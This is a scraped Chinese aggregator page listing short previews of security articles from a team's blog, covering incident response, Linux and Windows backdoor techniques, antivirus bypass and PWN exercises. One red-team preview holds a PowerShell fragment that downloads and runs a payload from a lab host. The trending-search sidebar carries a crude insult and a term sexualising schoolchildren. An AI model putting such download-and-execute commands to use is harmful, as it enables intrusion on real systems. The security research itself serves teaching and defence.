首页
下载应用
提交文章
关于我们
🔥 热搜 🔥
1
百度
2
今日热点
3
微信公众平台
4
贴吧
5
opgg
6
dnf私服
7
百度贴吧
8
知乎
9
dnf公益服
10
百度傻逼
分类
社会
娱乐
国际
人权
科技
经济
其它
首页
下载应用
提交文章
关于我们
🔥
热搜
🔥
1
上海
2
习近平
3
新疆
4
鄂州父女瓜
5
乌鲁木齐
6
疫情
7
H工口小学生赛高
8
习明泽
9
芊川一笑图包
10
印尼排华
分类
社会
娱乐
国际
人权
科技
经济
其它
高三女生醉酒后被强奸致死?检方回应
常德悲剧:让谴责无差别杀戮之声更加响亮一点
2024【公共营养师】培训报名通道已开启,不限学历,23岁及以上可报!还能领2000补贴
【惊】"以为要写遗书"! 飞温哥华航班遇炸弹气旋 华人崩溃大哭 连空姐都吐了; 客机颠簸盘旋3小时
女人最偏爱的十种男人
NOP Team
筛选:
全部
仅被删
排序:
热门
实时
其他
Electron 安全与你我息息相关
生成的进程中。https://www.electronjs.org/zh/blog/electron-22-0#utilityprocess-api-36089更详细信息参考官网,Electron
4月10日 上午 4:45
其他
远程调试的利用
<u>Team</u>sSignalGoby蚁剑Yakit参考
3月28日 下午 7:05
其他
RCE 遇到受限 shell 的突破
相关的,所以这里要么是通用功能,只不过在这个小摄像头里没有,要么就是系统自带的代理功能,我们尝试修改数据库,看看能不能有意外惊喜覆盖,重启看来并不行,就到这里了这下终于可以睡个好觉了...0x08
3月20日 下午 4:11
其他
服务隐藏与排查 | Windows 应急响应
套件中一款工具https://learn.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suitePsExec64.exe
1月15日 上午 12:10
其他
PowerShell 配置文件后门 | Windows 后门系列
C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1这些配置文件中都可以类似
1月6日 下午 9:42
其他
计划任务的攻防战 | Window 应急响应
套件中一款工具https://learn.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suitePsExec64.exe
1月5日 下午 2:26
其他
计划任务执行由谁决定 | Windows 应急响应
NT\CurrentVersion\Schedule\TaskCache\Tree计划任务的具体配置在此位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
1月4日 上午 4:21
其他
JS代码混淆 | js 逆向系列
userName=_0x5665ce(0xc6),greeting=greet(userName),greeting2=greet(person[_0x5665ce(0xcc)]);function
2023年12月20日
其他
JS Hook | js 逆向系列
值中包含字符串"TSdc75a61a",则会触发一个断点调试器,允许开发者在浏览器的调试工具中进行进一步的调试和处理。https://zhuanlan.zhihu.com/p/231651573//
2023年11月29日
其他
参数加密签名 & JS逆向
逆向技术会成为渗透测试工程师与红队检测相关人员的必备技能,所以目前相关文章和视频主要是搞爬虫那帮人在写这件事让我感到十分不安,于是有了这篇文章下面是一些案例可以看到,同样的参数,包重放就会导致
2023年10月15日
其他
Linux 应急响应手册 v1.8
declare小技巧新增文本内容对比方法2021.8.19补充了动态库劫持相关内容v1.12021.7.1解决了上一版本中图片缺失问题增加
2023年8月11日
其他
一次失败的漏洞串联尝试
这篇文章并不是一次成功的漏洞利用,而是一次失败的漏洞串联,主要记录在寻找串联可能性的过程中遇到的困难以及探索思路简单来说可能意义不大,如果你喜欢看探索过程,可以继续观看在一次漏洞挖掘过程中,我发现
2023年7月4日
其他
APT入侵应急响应靶场搭建 & 攻击过程
"44WkyvPxZqyLza3igQM21veKM2C5hWu37a1UShxNyCJRF4xZ4xhyJTgUAfv16P7RNN23KDnCLdVUnTqmbvhAVkdrSvtud7R",
2023年6月27日
自由知乎
自由微博
其他
APT 入侵应急响应已上线 B站
入侵应急响应培训分享一个有趣的ssh后门
2023年6月21日
其他
一次 APT 入侵应急响应培训分享
版本了,内容逐步完善,但是由于保密的要求,做过的应急响应项目没有办法当作案例来给大家展示前一段时间应朋友要求,给某单位录制了一次
2023年6月17日
其他
sudo 后门|Linux 后门系列
/etc/shadow这样可能造成的危害大小主要取决于运维人员具体打开的文件,如果是计划任务文件则攻击者可能新建计划任务、如果是一些开机加载、环境变量等文件,攻击者也可以进行添加内容0x03
2023年6月2日
其他
一个有趣的ssh后门 | Linux 后门系列
中并进行相应的配置,这样访问者可以使用固定的电脑无需输入密码就可以访问到服务器,在一定程度上安全和便利兼得,但是其实这里有一个不常用的参数非常适合用来做后门——command通常运维人员通过
NOP Team -
2023年5月25日
其他
Linux 应急响应手册 v1.7
declare小技巧新增文本内容对比方法2021.8.19补充了动态库劫持相关内容v1.12021.7.1解决了上一版本中图片缺失问题增加
NOP Team -
2023年4月27日
其他
更新源后门 | Linux 后门系列
文件等全都重新签名,之后在受害服务器中导入我们的签名第二种方法是我测试发现的,只要修改系统上部分文件内容,就可以实现绕过对软件包的校验一、重新签名,导入签名其实呢,这里有一个取巧的方法是直接修改
NOP Team -
2023年3月30日
其他
APT是如何杜绝软件包被篡改的
pool/main/a/accountsservice/accountsservice_0.6.45-1ubuntu1.3_amd64.debSize:
NOP Team -
2023年2月23日
其他
包管理器到底管理了什么?
似乎在资源访问、权限控制等方面更倾向于交给开发者打包时决定因为在我寻找官方文档中对于程序权限控制问题时,只找到了针对开发者的部分,告诉开发者如何配置权限和资源访问当然了,也提到了flatpak
NOP Team -
2023年2月11日
其他
Linux 应急响应手册 v1.6
https://pan.baidu.com/s/1R6VW-ydG7oGyW95cbyMG8g?pwd=1234
NOP Team -
2023年1月6日
其他
如何带走一个“鲜活”的进程 | Linux 应急响应
这一侧再次收到了反弹shell的请求此时便可以继续对该进程进行研究了,但是总感觉有些鸡肋假如说当前这台主机关机了,重启后,保存的进程镜像还能够再次恢复吗?关闭受害主机,Kali
NOP Team -
2023年1月6日
其他
不落地执行shell脚本 | Linux 后门系列
提供了一种登录不进入shell,直接执行命令的场景ssh
NOP Team -
2022年11月16日
其他
修改后门ctime | Linux 后门系列
Server操作系统默认存在时间同步服务,刚修改完下一秒就会变回正常时间(即使是断网的情况下)快到难以让人分辨到底修改成功没有,也正是这个特性,给我们省了非常多的事,稍后会说,Centos
NOP Team -
2022年11月2日
其他
Linux 应急响应手册 v1.5
Qiling框架入门-QilingLab使用阿里云OSS可能存在的两个安全风险与云函数&CDN的对抗
NOP Team -
2022年9月29日
其他
Qiling框架入门-QilingLab
这个API,可以hook特定地址。注册的回调将在执行指定地址时被调用。参考文档:https://docs.qiling.io/en/latest/hook/。通过
NOP Team -
2022年9月9日
其他
使用阿里云OSS可能存在的两个安全风险
<u>Team</u>
NOP Team -
2022年8月18日
其他
与云函数&CDN的对抗 | 应急响应
/lib/x86_64-linux-gnu/libnss_files-2.27.so......7fe9f5d65000-7fe9f5d66000
NOP Team -
2022年7月2日
其他
又一个 Windows 远程下载方法 | 红队攻防
对于很多攻击测试人员来说,只要让我把程序上传到服务器,让我执行,我就能给你一切我们希望把这个事情再向前推进一步,只要能执行命令,就能给你一切对于
NOP Team -
2022年6月22日
其他
一个 Linux 权限维持小 tip | Linux 后门系列
GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'#
NOP Team -
2022年6月10日
其他
堆溢出 —— unlink | PWN
magicheaphttps://github.com/bash-c/pwn_repo/tree/master/HITCON/hitconTraining_magicheapfastbins
NOP Team -
2022年5月15日
其他
2022 年 Ubuntu 16.04 配置 pwn 环境的一些小问题
源代码https://www.python.org/ftp/python/3.6.15/Python-3.6.15.tar.xztar
NOP Team -
2022年5月14日
其他
Linux 应急响应手册 v1.4
大家好,我是意大利的猫更新日记:v1.42022.4.30小技巧新增数据恢复章节完善挖矿和远控后门,新增确定程序运行时间章节善后阶段-日志分析新增
NOP Team -
2022年4月29日
其他
项目发布说明
(NOP<u>Team</u>)作为项目发布渠道,这样既不需要改变大家的使用习惯,也不会有广告的困扰,同时也不会耽误我们和大家交朋友的热忱这个公众号应该不会再涉及公司项目的问题了,是一个纯粹的团队技术公众号,相信这
NOP Team -
2022年4月14日
其他
cdb执行shellcode(免杀) | 红队攻防
@$ip=@$t0"+"\n")outfile.write("g"+"\n")outfile.write("g"+"\n")outfile.write("q")生成shell.wds文件后,将
NOP Team -
2022年3月23日
其他
放弃 powershell? 启动 sqlps!| 红队攻防
net.webclient).downloadstring(''http://192.168.80.138:80/a''))"'成功上线,弊端是
NOP Team -
2022年3月16日
其他
数据库连接利用工具——Sylas | 红队攻防
PROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令因此利用这个特性可以做到9.3版本后的任意代码执行,具体代码实现:CREATE
NOP Team -
2022年2月16日
其他
从一道 CTF 题看 SROP | PWN
执行栈顶地址的指令这个程序的意思就是将我们输入的内容读入到栈顶,之后执行栈顶地址存储的指令,我们看一下开了哪些防护==================================[*]
NOP Team -
2022年2月6日
其他
BROP 攻击技术 | PWN
年提出的,论文和幻灯片在参考资料中。实现这一攻击有两个必要条件:目标程序存在一个栈溢出漏洞,并且我们知道怎样去触发它目标进程在崩溃后会立即重启,并且重启后进程被加载的地址不变,这样即使目标机器开启了
NOP Team -
2022年1月28日
其他
MOTD 后门引发的思考 | Linux 后门系列
权限来启动的,所以很适合用来做后门实用部分随着关注我们的朋友越来越多,我们已经开始警觉性的将思考与使用尽可能分为两个方面,因为一部分人的需求就是不需要思考,直接拿过来用,所以先上实用部分motd
NOP Team -
2021年12月30日
其他
远程下载的通用替代方案 | 红队攻防
打了这么多的攻防演练了,很多时候我们可以执行命令了,但是没有回显、也不交互、添加加用户远程桌面没开、想远程下载木马有杀软拦截、循环写入遇到负载均衡、或者目标根本不出网当然了,一部分兄弟应该是有方法可以上线cs的,比如
NOP Team -
2021年12月22日
其他
浅谈 Windows Syscall
<u>Team</u>s。其具体含义是先解析
NOP Team -
2021年12月16日
其他
学完ELF人间清醒的总结 | Linux 二进制
链接过程中需要说明的细节【重定位说明】【符号和符号表说明】【初始化和终止例程】【地址无关代码】【延迟绑定】静态链接过程动态链接过程装载时链接
NOP Team -
2021年10月21日
其他
Windows defender bypass | 免杀
默认存在一些排除项,在实时检测过程中会忽略这些排除项,但是主动扫描的时候不会排除。这就给
NOP Team -
2021年6月6日
其他
LD_PRELOAD 劫持 PWD 为什么失败了 | Linux 后门系列
https://blog.csdn.net/zyt157376/article/details/85371911这里提一点:默认情况编译器会自作聪明将只有一个字符串参数的printf替换成puts
NOP Team -
2021年6月3日
其他
SSH Config 后门 | Linux 后门系列
aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc#
NOP Team -
2021年5月25日
其他
自建虚拟专用网络 | 奇怪的知识又增加了
"https://api.godaddy.com/v1/domains/${mydomain}/records/A/${myhostname}"`gdip=`echo
漫流砂 -
2021年2月11日
其他
Sqlmap使用中遇到的一个小破问题
修改之路,哎,都因为这破网,不然也不会掌握一门技能,在这里我就不写怎么修改,新增了,因为有一片文章写的贼好,我附上,如果哪天无聊,我想写再写出来吧,可以参考
漫流砂 -
2020年12月29日
其他
三进三出 | 渗透测试
从我这张全是马赛克的图里,老司机们应该能迅速反应过来,代码的后端逻辑其实是先将上传的文件重命名为x.tmp存在缓存文件夹中,再重命名为我们之前filename设定的名字移动到指定的web目录下。
漫流砂 -
2020年8月5日
{{{deleted_alert}}}
{{classification}}
{{{title}}}
{{{preview}}}
{{nickname}}
{{ct}}
更多